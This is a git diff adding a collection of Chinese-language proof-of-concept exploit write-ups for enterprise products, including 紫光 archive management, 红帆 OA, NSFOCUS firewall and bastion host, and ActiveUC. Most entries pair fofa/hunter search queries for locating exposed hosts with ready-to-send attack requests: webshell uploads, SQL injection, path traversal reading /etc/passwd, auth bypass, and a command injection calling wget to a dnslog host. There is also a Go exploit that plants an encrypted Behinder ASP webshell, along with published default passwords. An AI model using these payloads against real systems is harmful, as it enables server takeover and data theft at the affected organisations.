+++ b/紫光档案管理系统WorkFlow存在任意文件上传漏洞.md
@@ -0,0 +1,70 @@
+# 紫光档案管理系统WorkFlow存在任意文件上传漏洞
+
+# 一、漏洞简介
+紫光电子档案管理系统是一款专业的电子档案管理软件，旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能，能够提供全面的档案管理解决方案。同时，紫光电子档案管理系统还拥有智能化的分类和归档功能，可以自动识别文件类型和属性，实现快速分类和高效管理。用户只需简单操作，就能轻松实现对各类电子档案的整理、查询和备份，极大提升了工作效率和信息安全性。紫光档案管理系统WorkFlow存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 紫光档案管理系统
+
+# 三、资产测绘
++ hunter`app.name="紫光档案管理系统"`
++ 特征
+
+![1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093.png](./img/XBNrpIgiaD34ynSQ/1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093-481346.png)
+
+# 四、漏洞复现
+```plain
+POST /System/WorkFlow/upload.html?token=5117e82385cef4c12547fdd4c028b97a1-1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Connection: close
+Content-Length: 566
+Accept: */*
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=vow8ojiofbpypwih3t3i
+
+--vow8ojiofbpypwih3t3i
+Content-Disposition: form-data; name="userID"
+
+admin
+--vow8ojiofbpypwih3t3i
+Content-Disposition: form-data; name="fondsid"
+
+1
+--vow8ojiofbpypwih3t3i
+Content-Disposition: form-data; name="comid"
+
+1
+--vow8ojiofbpypwih3t3i
+Content-Disposition: form-data; name="token"
+
+affe447f075bac53a7e568e833391e67
+--vow8ojiofbpypwih3t3i
+Content-Disposition: form-data; name="Filedata"; filename="wizjbifuta.php"
+Content-Type: multipart/form-data
+
+
+<?php echo "2ccASC47CJ474cqTBuzA0q6FCAS";unlink(__FILE__); ?>
+--vow8ojiofbpypwih3t3i--
+```
+
+![1708400624091-0445193c-2775-46e8-941b-14504eb04eca.png](./img/XBNrpIgiaD34ynSQ/1708400624091-0445193c-2775-46e8-941b-14504eb04eca-391445.png)
+
+上传文件位置
+
+```plain
+GET /tmp/System/WorkFlow/import/20240220/65d41fbc77b27.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
+Connection: close
+Accept: text/*
+Cookie: PHPSESSID=d3dbba517d0d6ff544f1be11e134a7f9
+Accept-Encoding: gzip, deflate
+```
+
+![1708400691415-3428fb4b-98d4-43ce-ae07-f9b7a0edae2e.png](./img/XBNrpIgiaD34ynSQ/1708400691415-3428fb4b-98d4-43ce-ae07-f9b7a0edae2e-480631.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qgnm98f455xygfw3>
\ No newline at end of file
diff --git a/紫光档案管理系统editPass存在SQL注入漏洞.md b/紫光档案管理系统editPass存在SQL注入漏洞.md
new file mode 100644
index 0000000..79f1648
--- /dev/null
+++ b/紫光档案管理系统editPass存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 紫光档案管理系统editPass存在SQL注入漏洞
+
+# 一、漏洞简介
+紫光电子档案管理系统是一款专业的电子档案管理软件，旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能，能够提供全面的档案管理解决方案。同时，紫光电子档案管理系统还拥有智能化的分类和归档功能，可以自动识别文件类型和属性，实现快速分类和高效管理。用户只需简单操作，就能轻松实现对各类电子档案的整理、查询和备份，极大提升了工作效率和信息安全性。紫光档案管理系统editPass存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 紫光档案管理系统
+
+# 三、资产测绘
++ hunter`app.name="紫光档案管理系统"`
++ 特征
+
+![1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093.png](./img/j5f7yjDb2Np2A0LL/1706701328959-e1863eab-b7f1-4486-80c8-0a22052ee093-198835.png)
+
+# 四、漏洞复现
+```plain
+/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
+```
+
+![1706702958468-3b2d1939-8759-471a-b80c-468e348230f1.png](./img/j5f7yjDb2Np2A0LL/1706702958468-3b2d1939-8759-471a-b80c-468e348230f1-888044.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mqsvv42n8mikbt25>
\ No newline at end of file
diff --git a/紫光档案管理系统mergeFile存在SQL注入漏洞.md b/紫光档案管理系统mergeFile存在SQL注入漏洞.md
new file mode 100644
index 0000000..2cd9df9
--- /dev/null
+++ b/紫光档案管理系统mergeFile存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 紫光档案管理系统mergeFile存在SQL注入漏洞
+紫光电子档案管理系统是一款专业的电子档案管理软件，旨在帮助企业实现高效、便捷的档案管理。系统具有强大的文件存储、检索和共享功能，能够提供全面的档案管理解决方案。同时，紫光电子档案管理系统还拥有智能化的分类和归档功能，可以自动识别文件类型和属性，实现快速分类和高效管理。用户只需简单操作，就能轻松实现对各类电子档案的整理、查询和备份，极大提升了工作效率和信息安全性。紫光档案管理系统mergeFile存在SQL注入漏洞
+
+## fofa
+```javascript
+app="紫光-档案管理系统" && body="www.unissoft.com"
+```
+
+## poc
+```java
+POST /Archive/ErecordManage/mergeFile HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
+
+userID=admin&fondsid=1&comid=1'
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731327037075-c9e88b13-b658-4e7e-b7ad-a6c7d12dca30.png)
+
diff --git a/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md b/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md
new file mode 100644
index 0000000..f96226d
--- /dev/null
+++ b/紫光电子档案管理系统selectFileRemote存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 紫光电子档案管理系统selectFileRemote存在SQL注入漏洞
+
+紫光电子档案管理系统selectFileRemote存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="www.unissoft.com"
+```
+
+## poc
+
+```javascript
+POST /Archive/ErecordManage/selectFileRemote HTTP/1.1
+Host: {{Hostname}}
+Accept: */* Accept-Encoding: gzip, deflate
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+userID=admin&fondsid=1&comid=1'
+```
+
diff --git a/红帆OA iorepsavexml.aspx 文件上传漏洞.md b/红帆OA iorepsavexml.aspx 文件上传漏洞.md
index fdaa557..9190bf0 100644
--- a/红帆OA iorepsavexml.aspx 文件上传漏洞.md	
+++ b/红帆OA iorepsavexml.aspx 文件上传漏洞.md	
@@ -1,7 +1,14 @@
 
 ## 红帆OA iorepsavexml.aspx 文件上传漏洞
 
+## fofa
+
+```
+app="红帆-ioffice"
+```
+
 ## exp
+
 ```go
 package main
 
diff --git a/红帆OA zyy_AttFile.asmx SQL注入漏洞.md b/红帆OA zyy_AttFile.asmx SQL注入漏洞.md
index f20434c..f7dbe57 100644
--- a/红帆OA zyy_AttFile.asmx SQL注入漏洞.md	
+++ b/红帆OA zyy_AttFile.asmx SQL注入漏洞.md	
@@ -9,8 +9,6 @@ app="红帆-ioffice"
 ```
 POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
 Host: 10.250.250.5
-User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
-like Gecko) Version/12.0.3 Safari/605.1.15
 Content-Length: 383
 Content-Type: text/xml; charset=utf-8
 Soapaction: "http://tempuri.org/GetFileAtt"
diff --git a/红帆OA-iorepsavexml.aspx-文件上传漏洞.md b/红帆OA-iorepsavexml.aspx-文件上传漏洞.md
new file mode 100644
index 0000000..fdaa557
--- /dev/null
+++ b/红帆OA-iorepsavexml.aspx-文件上传漏洞.md
@@ -0,0 +1,128 @@
+
+## 红帆OA iorepsavexml.aspx 文件上传漏洞
+
+## exp
+```go
+package main
+
+import (
+        "crypto/tls"
+        "fmt"
+        "github.com/hpifu/go-kit/hflag"
+        "github.com/imroc/req/v3"
+        "github.com/liushuochen/gotable"
+        "github.com/thanhpk/randstr"
+        "log"
+        "net/http"
+        "os"
+        "strings"
+        "time"
+)
+
+func main() {
+        now := time.Now()
+        param := getParam()
+        uploader(param)
+        fmt.Printf("[√] 速度还是挺快的就这么点时间%s就GetShell了.", time.Since(now).String())
+}
+
+func getParam() string {
+        hflag.AddFlag("target", "海翔地址", hflag.Required(), hflag.Shorthand("t"))
+        if err := hflag.Parse(); err != nil {
+                fmt.Println(hflag.Usage())
+                os.Exit(0)
+        }
+        return hflag.GetString("target")
+}
+
+func reqClient() *req.Client {
+        cli := req.C()
+        cli.SetAutoDecodeAllContentType()
+        cli.SetRedirectPolicy(req.NoRedirectPolicy())
+        cli.SetTimeout(time.Second * 15)
+        cli.SetTLSFingerprintSafari()
+        cli.TLSClientConfig = &tls.Config{InsecureSkipVerify: true,
+                MinVersion: tls.VersionTLS10,
+                MaxVersion: tls.VersionTLS13}
+        return cli
+}
+
+func uploader(target string) {
+        shellName := randstr.Hex(8) + ".asp"
+        shellString := "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" \nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>\n"
+        vulUrl := strings.Replace(target+"/ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename="+shellName+"&filepath=/upfiles/rep/pic/", "//io", "/io", 1)
+        client := reqClient()
+        post, err := client.R().SetBody(shellString).Post(vulUrl)
+        if err != nil {
+                log.Println(err)
+                return
+        }
+        defer func() {
+                _ = post.Body.Close()
+        }()
+        if post.StatusCode != http.StatusOK {
+                fmt.Println("GetShell Failed")
+                return
+        }
+        shellURL := strings.Replace(target+"/ioffice/upfiles/rep/pic/"+shellName, "//io", "/io", 1)
+        get, _ := client.R().Get(shellURL)
+        if get.StatusCode != http.StatusNotFound {
+                create, _ := gotable.Create("Shell连接工具", "Shell连接地址", "Shell连接密码")
+                _ = create.AddRow([]string{
+                        "冰蝎", shellURL, "rebeyond",
+                })
+                fmt.Println(create)
+        }
+        defer func() {
+                _ = get.Body.Close()
+        }()
+}
+
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/39e2c87c-080f-42f6-a7a2-5f79fc6d9204)
+
+## yaml poc
+```
+
+id: hongfanOA-iorepsavexml-aspx-GetShell
+
+info:
+  name: 红帆OA iorepsavexml.aspx 文件上传漏洞
+  author: kyo
+  severity: critical
+  description: |
+    红帆OA在上传时可被绕过上传的限制
+  reference:
+    -  
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: title="iOffice.net"
+  tags: hongfan,oa,upload
+
+http:
+  - raw:
+      - |
+        POST /ioffice/prg/set/report/iorepsavexml.aspx?key=writefile&filename=qaxnb.txt&filepath=/upfiles/rep/pic/ HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 0
+
+        qaxnb
+      - |
+        GET /ioffice/upfiles/rep/pic/qaxnb.txt HTTP/1.1
+        Host: {{Hostname}}
+
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1==200 && status_code_2 == 200'
+          - 'contains(body_2, "qaxnb")'
+        condition: and
+
+# digest: 4b0a00483046022100ace369b495c3c20753d111b9951b654c66682b38ecb89775c65cb0e9b23dd21d022100a9a3b446556750d6ecd73dff1605d01a1c60728720f4ee0c54654b1dcbd4c5d8:922c64590222798bb761d5b6d8e72951
+```
+
diff --git a/红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md b/红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md
new file mode 100644
index 0000000..f20434c
--- /dev/null
+++ b/红帆OA-zyy_AttFile.asmx-SQL注入漏洞.md
@@ -0,0 +1,26 @@
+## 红帆OA zyy_AttFile.asmx SQL注入漏洞
+
+## fofa
+```
+app="红帆-ioffice"
+```
+
+## poc
+```
+POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
+Host: 10.250.250.5
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
+like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Length: 383
+Content-Type: text/xml; charset=utf-8
+Soapaction: "http://tempuri.org/GetFileAtt"
+Accept-Encoding: gzip, deflate
+Connection: close
+
+<?xml version="1.0" encoding="utf-8"?><soap:Envelope
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
+xmlns="http://tempuri.org/"><fileName>1231=user_name()</fileName></GetFileAtt> </soap:Body></so
+ap:Envelope>
+```
diff --git a/红海云eHR系统pc.mob存在sql注入漏洞.md b/红海云eHR系统pc.mob存在sql注入漏洞.md
new file mode 100644
index 0000000..3115dcc
--- /dev/null
+++ b/红海云eHR系统pc.mob存在sql注入漏洞.md
@@ -0,0 +1,19 @@
+# 红海云eHR系统pc.mob存在sql注入漏洞
+
+红海云eHR系统pc.mob存在sql注入漏洞
+
+## fofa
+
+```yaml
+body="/RedseaPlatform/skins/images/favicon.ico"
+```
+
+## poc
+
+```java
+GET /RedseaPlatform/goApp/pc.mob?id=1%27%20AND%20(SELECT%204802%20FROM%20(SELECT(SLEEP(5)))ndMq)%20AND%20%27NEoX%27=%27NEoX HTTP/1.1
+Host: {{Hostname}}
+Cookie: JSESSIONID=905D36CF9349B41FBFB0203D2BAA8CCC
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+```
+
diff --git a/绿盟-NF-下一代防火墙-任意文件上传漏洞.md b/绿盟-NF-下一代防火墙-任意文件上传漏洞.md
new file mode 100644
index 0000000..7dad7d0
--- /dev/null
+++ b/绿盟-NF-下一代防火墙-任意文件上传漏洞.md
@@ -0,0 +1,15 @@
+## 绿盟 NF 下一代防火墙 任意文件上传漏洞
+```
+POST /api/v1/device/bugsInfo HTTP/1.1
+Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
+Host:
+--4803b59d015026999b45993b1245f0ef
+Content-Disposition: form-data; name="file"; filename="compose.php"
+<?php eval($_POST['cmd']);?>
+--4803b59d015026999b45993b1245f0ef--
+POST /mail/include/header_main.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
+Host:
+cmd=phpinfo();
+```
diff --git a/绿盟SAS堡垒机Exec远程命令执行漏洞.md b/绿盟SAS堡垒机Exec远程命令执行漏洞.md
new file mode 100644
index 0000000..bddff51
--- /dev/null
+++ b/绿盟SAS堡垒机Exec远程命令执行漏洞.md
@@ -0,0 +1,35 @@
+# 绿盟 SAS堡垒机 Exec 远程命令执行漏洞
+
+# 一、漏洞执行
+绿盟 SAS堡垒机 Exec 远程命令执行漏洞，攻击者可通过该漏洞获取服务器控制权限。
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 绿盟SAS堡垒机
+
+# 三、资产测绘
++ hunter`app.name="NSFOCUS 绿盟 SAS"`
+
+![1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png](./img/mv6562pcTMScguT0/1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce-397151.png)
+
++ 登录页面
+
+![1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png](./img/mv6562pcTMScguT0/1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88-049882.png)
+
+# 四、漏洞复现
+```plain
+GET /webconf/Exec/index?cmd=wget%200nicnk.dnslog.cn HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1699631390274-e13e84c5-8436-4db2-ac80-05982c2a23f9.png](./img/mv6562pcTMScguT0/1699631390274-e13e84c5-8436-4db2-ac80-05982c2a23f9-483338.png)
+
+![1699631405537-551fadb6-953b-4d16-af40-dbafadbb5587.png](./img/mv6562pcTMScguT0/1699631405537-551fadb6-953b-4d16-af40-dbafadbb5587-876996.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yxzz8e5biz6qbl41>
\ No newline at end of file
diff --git a/绿盟SAS堡垒机GetFile任意文件读取漏洞.md b/绿盟SAS堡垒机GetFile任意文件读取漏洞.md
new file mode 100644
index 0000000..85287ca
--- /dev/null
+++ b/绿盟SAS堡垒机GetFile任意文件读取漏洞.md
@@ -0,0 +1,41 @@
+# 绿盟SAS堡垒机GetFile任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">绿盟堡垒机后台存在任意文件读取漏洞，攻击者可通过/webconf/GetFile 接口进行任意文件读取。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 绿盟SAS堡垒机
+
+# 三、资产测绘
++ hunter`app.name="NSFOCUS 绿盟 SAS"`
+
+![1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png](./img/VzHdqx2ESnEuSNwR/1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce-471038.png)
+
++ 登录页面
+
+![1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png](./img/VzHdqx2ESnEuSNwR/1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88-820589.png)
+
+# 四、漏洞复现
+```plain
+GET /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=4d44c08bdf4492b7877f79ffa7122d3c
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1692346816258-20ff0e28-140a-4e23-b0f2-76a904fd5c4d.png](./img/VzHdqx2ESnEuSNwR/1692346816258-20ff0e28-140a-4e23-b0f2-76a904fd5c4d-833447.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cz6wgk0d6xpv4lmz>
\ No newline at end of file
diff --git a/绿盟SAS堡垒机local_user.php任意用户登录漏洞.md b/绿盟SAS堡垒机local_user.php任意用户登录漏洞.md
new file mode 100644
index 0000000..8d0e2ea
--- /dev/null
+++ b/绿盟SAS堡垒机local_user.php任意用户登录漏洞.md
@@ -0,0 +1,51 @@
+# 绿盟SAS堡垒机local_user.php任意用户登录漏洞
+
+# 一、漏洞简介
+绿盟堡垒机存在任意用户登录漏洞，攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录。
+
+# 二、影响版本
++ 绿盟SAS堡垒机
+
+## 三、资产测绘
++ hunter`app.name="NSFOCUS 绿盟 SAS"`
+
+![1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce.png](./img/w4hwzlZLp5D37wYG/1692345776559-f5624e5a-4bb4-49a1-891a-79dd9dc6ddce-152262.png)
+
++ 登录页面
+
+![1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88.png](./img/w4hwzlZLp5D37wYG/1692345819090-b23ee8fd-4a29-497b-a62a-e7957b5cfd88-428175.png)
+
+# 四、漏洞复现
+poc访问出现如下页面即可能存在漏洞
+
+```plain
+GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=03eea4323452c328c6462f1bb50a0a9b; Hm_lvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; Hm_lpvt_2743f882f7de0bd7d8ffc885a04c90f5=1692345507; left_menustatue_NSFOCUSnbspSASH=0|0|https://yzyx.loogear.com/home/status
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1692345978621-ec4e3a8b-10e7-4f9f-83b4-4dd2ae4922f3.png](./img/w4hwzlZLp5D37wYG/1692345978621-ec4e3a8b-10e7-4f9f-83b4-4dd2ae4922f3-330623.png)
+
+然后直接访问堡垒机域名即可计入后台
+
+```plain
+http://xx.xx.xx.xx
+```
+
+![1692346036852-fabd8787-4603-474b-894e-25a08c3f8394.png](./img/w4hwzlZLp5D37wYG/1692346036852-fabd8787-4603-474b-894e-25a08c3f8394-661387.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/szf74hcc2561xmxb>
\ No newline at end of file
diff --git a/网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md b/网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md
new file mode 100644
index 0000000..bafcf33
--- /dev/null
+++ b/网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞.md
@@ -0,0 +1,25 @@
+## 网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞
+
+网动统一通信平台是采用统一的通信界面，将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台，接口 `/acenter/iactiveEnterMeeting.action?roomid=1&username=admin` 存在信息泄露漏洞，可能导致管理员密码泄露获取后台权限等。
+
+## hunter
+
+```javascript
+web.title=="网动统一通信平台(Active UC)"
+```
+
+
+## poc
+```javascript
+GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+```
+
+![image-20241014095902804](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410140959976.png)
diff --git a/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md b/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md
new file mode 100644
index 0000000..bd0273d
--- /dev/null
+++ b/网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞.md
@@ -0,0 +1,33 @@
+# 网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞
+
+# 一、漏洞简介
+ 网动统一通信平台是一个涵盖了多种通信功能的综合平台，通常包括文字、语音、视频通讯等功能，并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性，为用户提供一个统一的通信环境。网动统一通信平台iactiveEnterMeeting存在密钥泄露漏洞
+
+# 二、影响版本
++ 网动统一通信平台
+
+# 三、资产测绘
++ fofa`title="网动统一通信平台(Active UC)"`
++ 特征
+
+![1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png](./img/bchEO-h-HB8Wt1xO/1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48-583994.png)
+
+---
+
+# 四、漏洞复现
+```http
+GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+```
+
+![1728895972113-cd2610be-9b1a-425a-a4c5-db5f41756e26.png](./img/bchEO-h-HB8Wt1xO/1728895972113-cd2610be-9b1a-425a-a4c5-db5f41756e26-783469.png)
+
+解密后可登录系统
+
+![1728896161193-80cbf6bb-9a72-40fa-90e6-0b901c7ad4d7.png](./img/bchEO-h-HB8Wt1xO/1728896161193-80cbf6bb-9a72-40fa-90e6-0b901c7ad4d7-462992.png)
+
+
+
+> 更新: 2024-10-22 09:40:55  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rq6gi25kn08phghs>
\ No newline at end of file
diff --git a/网动统一通信平台meetingShow存在任意文件读取漏洞.md b/网动统一通信平台meetingShow存在任意文件读取漏洞.md
new file mode 100644
index 0000000..a292cb1
--- /dev/null
+++ b/网动统一通信平台meetingShow存在任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# 网动统一通信平台meetingShow存在任意文件读取漏洞
+
+# 一、漏洞简介
+ 网动统一通信平台是一个涵盖了多种通信功能的综合平台，通常包括文字、语音、视频通讯等功能，并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性，为用户提供一个统一的通信环境。网动统一通信平台meetingShow接口处存在任意文件下载漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。  
+
+# 二、影响版本
++ 网动统一通信平台
+
+# 三、资产测绘
++ fofa`title="网动统一通信平台(Active UC)"`
++ 特征
+
+![1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png](./img/rg7PTmSeir6Foadu/1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48-543498.png)
+
+---
+
+# 四、漏洞复现
+```http
+GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml&filename=xxx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1715182117189-1a34bfe4-90d0-470b-bb64-7e14114e7587.png](./img/rg7PTmSeir6Foadu/1715182117189-1a34bfe4-90d0-470b-bb64-7e14114e7587-702187.png)
+
+
+
+
+
+> 更新: 2024-10-22 09:40:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ey50q344kqgz0zoh>
\ No newline at end of file
diff --git a/网动统一通信平台存在默认口令漏洞.md b/网动统一通信平台存在默认口令漏洞.md
new file mode 100644
index 0000000..7b364b4
--- /dev/null
+++ b/网动统一通信平台存在默认口令漏洞.md
@@ -0,0 +1,28 @@
+# 网动统一通信平台存在默认口令漏洞
+
+# 一、漏洞简介
+ 网动统一通信平台是一个涵盖了多种通信功能的综合平台，通常包括文字、语音、视频通讯等功能，并且可能提供了一系列的通讯工具和服务。这样的平台通常旨在提升用户的沟通效率和便利性，为用户提供一个统一的通信环境。网动统一通信平台存在默认口令漏洞
+
+# 二、影响版本
++ 网动统一通信平台
+
+# 三、资产测绘
++ fofa`title="网动统一通信平台(Active UC)"`
++ 特征
+
+![1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48.png](./img/8SfqFBE2nPpYVL4X/1715181346183-38fe9fce-95da-4fcc-9444-e758323b5b48-314671.png)
+
+---
+
+# 四、漏洞复现
+```http
+admin/iactive
+1/iactive
+```
+
+![1728896591772-7a5c1305-1889-4603-b007-b881fe862424.png](./img/8SfqFBE2nPpYVL4X/1728896591772-7a5c1305-1889-4603-b007-b881fe862424-613866.png)
+
+
+
+> 更新: 2024-10-22 09:40:55  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zppgnwmc7v8hf3g7>
\ No newline at end of file
